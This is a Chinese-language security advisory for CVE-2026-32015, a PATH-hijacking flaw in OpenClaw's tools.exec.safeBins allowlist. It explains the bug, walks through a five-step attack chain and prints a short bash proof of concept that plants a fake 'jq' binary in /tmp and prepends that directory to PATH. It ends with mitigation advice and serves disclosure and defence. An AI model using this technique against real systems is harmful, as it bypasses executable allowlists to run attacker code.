CVE-2026-32015 CVSS 7.8 高危

CVE-2026-32015 OpenClaw路径劫持漏洞

披露日期: 2026-03-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32015

漏洞类型

路径劫持

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.1.21至2026.2.19之前的版本中存在路径劫持漏洞，位于tools.exec.safeBins组件。攻击者可通过控制进程PATH解析绕过白名单检查。若能影响网关进程PATH或启动环境，攻击者可执行白名单名称（如jq）的木马二进制文件，从而绕过可执行文件验证控制，导致安全隐患。

技术细节

该漏洞源于OpenClaw的tools.exec.safeBins模块在执行白名单验证机制时存在逻辑缺陷。该模块旨在限制仅能执行特定的、经过验证的二进制文件（如jq），但在实际调用过程中，未强制使用绝对路径或对路径进行严格的规范化校验，而是依赖系统PATH环境变量进行命令解析。这种依赖环境变量的机制赋予了攻击者利用空间。如果攻击者能够影响网关进程的环境变量配置，或者在启动OpenClaw的进程中注入恶意PATH，即可将包含恶意同名二进制文件的目录路径插入到系统PATH的前端。当OpenClaw尝试执行白名单内的工具时，操作系统会优先在攻击者控制的目录下查找并加载恶意程序。这使得攻击者能够完全绕过白名单限制，伪装成合法工具执行任意代码，进而控制系统。

攻击链分析

STEP 1

环境准备

攻击者获取能够影响OpenClaw进程环境变量（特别是PATH）的能力，或者在可写目录中创建文件。

STEP 2

投放载荷

攻击者创建一个恶意二进制文件，并将其命名为白名单中允许的工具名称（例如jq）。

STEP 3

路径劫持

攻击者修改进程的PATH环境变量，将包含恶意文件的目录路径添加到系统PATH的最前面。

STEP 4

触发执行

当OpenClaw尝试通过tools.exec.safeBins执行白名单工具时，系统根据PATH优先级加载了攻击者的恶意文件。

STEP 5

达成攻击

恶意代码以OpenClaw的权限级别执行，攻击者成功绕过白名单验证控制系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash

# PoC for CVE-2026-32015: OpenClaw Path Hijacking
# This script simulates the vulnerability by placing a malicious binary in PATH

# 1. Create a directory to host the malicious binary
mkdir -p /tmp/exploit_dir

# 2. Create a malicious binary named 'jq' (allowlisted tool)
echo '#!/bin/bash' > /tmp/exploit_dir/jq
echo 'echo "[+] Exploit Executed: Hijacked jq binary"' >> /tmp/exploit_dir/jq
echo 'id' >> /tmp/exploit_dir/jq
chmod +x /tmp/exploit_dir/jq

# 3. Hijack the PATH variable
export PATH=/tmp/exploit_dir:$PATH

# 4. Simulate the application calling the allowlisted tool
# In a real scenario, this would be triggered by OpenClaw's tools.exec.safeBins
jq
echo "[+] PoC finished. Check output above."

影响范围

OpenClaw < 2026.2.19

防御指南

临时缓解措施

在未升级的情况下，应严格隔离OpenClaw的运行环境，防止攻击者篡改PATH环境变量。同时，检查并清理系统PATH中不必要的目录，确保白名单工具的真实路径位于PATH搜索顺序的最前方。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表